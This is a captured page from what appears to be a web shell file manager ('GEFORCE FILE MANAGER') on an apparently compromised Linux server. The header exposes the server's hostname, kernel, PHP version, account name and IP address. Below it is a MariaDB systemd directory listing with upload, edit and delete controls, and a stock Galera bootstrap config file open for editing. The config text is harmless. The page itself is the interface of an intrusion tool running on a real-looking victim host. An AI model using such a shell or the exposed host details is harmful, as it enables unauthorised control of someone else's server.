[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
share
/
mysql
/
systemd
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 mariadb-extra@.socket
554 B
SET
[ EDIT ]
|
[ DEL ]
📄 mariadb.service
5,714 B
SET
[ EDIT ]
|
[ DEL ]
📄 mariadb@.service
9,842 B
SET
[ EDIT ]
|
[ DEL ]
📄 mariadb@.socket
616 B
SET
[ EDIT ]
|
[ DEL ]
📄 mysql.service
5,714 B
SET
[ EDIT ]
|
[ DEL ]
📄 mysqld.service
5,714 B
SET
[ EDIT ]
|
[ DEL ]
📄 use_galera_new_cluster.conf
676 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: use_galera_new_cluster.conf
# # Install as /etc/systemd/system/mariadb@bootstrap.service.d/use_galera_new_cluster.conf # # MariaDB uses /usr/bin/galera_new_cluster # # This is here to help guide people that may have used Percona mysql@bootstrap # to the correct implementation. [Unit] ConditionPathExists= [Service] Type=oneshot Restart=no # Don't install or try to prepare for galera SST. ExecStartPre= # Override the multi instance service for a bootstrap start instance ExecStart= ExecStart=/usr/bin/echo "Please use galera_new_cluster to start the mariadb service with --wsrep-new-cluster" ExecStart=/usr/bin/false # This isn't a service meant to execute anything but a message ExecStartPost=